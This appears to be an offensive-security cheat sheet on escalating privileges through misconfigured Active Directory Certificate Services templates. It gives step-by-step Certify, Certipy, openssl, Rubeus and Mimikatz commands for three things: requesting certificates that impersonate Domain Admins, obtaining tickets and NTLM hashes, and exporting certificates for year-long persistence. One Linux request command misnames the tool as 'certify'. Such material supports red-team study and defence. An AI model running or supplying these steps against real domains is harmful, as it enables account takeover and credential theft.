Certificate Services

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Persistence

Vulnerability

Active Directory Certificate Services uses certificate templates that are provided by Microsoft. The purpose of these templates it to be duplicated before configured. It exists misconfigurations in these templates that could be abused if not corrected when configured to escalate your privileges.

Prerequisites

  • Low privileged domain user.

Exploit

First, list vulnerable certificate templates with Certify for Windows or Certipy for Linux.

# From a domain joined computer.
./Certify.exe find /vulnerable

# From Kali Linux.
certipy find -u $Username@$DomainName -p $Password -dc-ip $DomainControllerIP -vulnerable

To continue this exploit, previous command should output [!] Vulnerable Certificates Templates with following conditions:

  • Certificate Name Flag must be set to ENROLLEE_SUPPLIES_SUBJECT to allow the requestor to provide any Subject Alternative Name.
  • Extended Key Usage must contain Client Authentication.
  • Enrollment Rights must contain a group in which you have compromised a user.

With all this prerequisites, you can request an authentication certificate for any other domain user, including Domain Admin.

If you have a foothold in the target domain from a non-joined computer - for example by passing the ticket -, check this issue to modify Certify source code to make it work.

# Request a certificate for the target user.
# Add /machine if you are logged on as SYSTEM.
./Certify.exe request /ca:$CAName /template:$TemplateName /altname:$TargetUser

# From Kali Linux.
certify req -target-ip $CertificateAuthorityIP -ca $CAName -template $TemplateName -spn $TargetUser@$DomainName -u $Username -p $Password

# Convert the entire certificate (private key + certificate = cert.pem) so it can be used by Rubeus.
# Setup the password you want during the process.
# This step is not needed from Kali Linux since Certipy makes the conversion automatically.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cat cert.pfx | base64 -w 0

# Then ask a TGT for the target user.
./Rubeus.exe asktgt /user:$TargetUser /certificate:$Base64EncodedCertificate /password:$Password /nowrap

# Even better with Certipy, you can retrieve the NTLM hash of the targeted user.
certipy auth -pfx cert.pfx -username $TargetUser -domain $DomainName -dc-ip $DomainControllerIP

Persistence

Once local administrator - or Domain Admin - you can export certificates to authenticate with later. User certificates are valid 1 year by default, so enjoy it! To list certificates, use Seatbelt or in Certificates - Current User\Personal\Certificates\.

# List certificates and make sure certificate is used for client authentication.
./Seatbelt.exe Certificates

# Export certificates with Mimikatz (certificate's password is `mimikatz` in this case).
crypto::certificates /export

# Encode exported certificate.
cat cert.pfx | base64 -w 0

# Ask TGT with Rubeus.
./Rubeus.exe asktgt /user:$TargetUser /certificate:$Base64EncodedCertificate /password:mimikatz /nowrap